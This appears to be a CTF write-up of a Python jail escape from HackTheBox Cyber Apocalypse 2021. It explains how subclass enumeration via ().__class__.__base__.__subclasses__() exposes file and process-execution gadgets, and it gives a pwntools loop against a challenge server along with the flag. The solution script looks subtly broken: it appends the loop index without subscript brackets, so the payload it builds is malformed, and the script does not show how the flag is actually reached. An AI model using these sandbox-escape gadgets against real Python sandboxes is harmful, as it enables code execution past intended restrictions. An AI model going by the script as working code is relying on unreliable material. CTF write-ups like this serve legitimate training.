Skip to content

HackTheBox Cyber Apocalypse CTF 2021: Build Yourself In

TL;DR

  • This is a Python jail challenge with restricted input.
  • Python object inheritance is not properly sandboxed.
  • Using ().__class__.__base__.__subclasses__() allows enumeration of all loaded classes.
  • Enumerating subclasses leaks powerful primitives such as file handlers and process execution.
  • Brute-force indexing over subclasses reveals usable gadgets.
  • The flag is recovered once the correct subclass is identified and abused.

Video Walkthrough

HackTheBox Cyber Apocalypse CTF 2021 Build Yourself In misc video walkthrough showing Python jail escape via __subclasses__

Challenge Description

The extraterrestrials have upgraded their authentication system and now only them are able to pass. Did you manage to learn their language well enough in order to bypass the the authorization check?

Solution

from pwn import *

context.log_level = 'warning'

for i in range(100):
    io = remote("138.68.151.248", 30697)
    # to_enumerate = '().__class__.__base__.__subclasses__()'
    to_enumerate = '().__class__.__base__.__subclasses__()'
    io.sendlineafter(
        '>>>', '[print(x) for x in [[' + to_enumerate + str(i) + ']]]')
    print(io.recvline())

Flag: CHTB{n0_j4il_c4n_h4ndl3_m3!}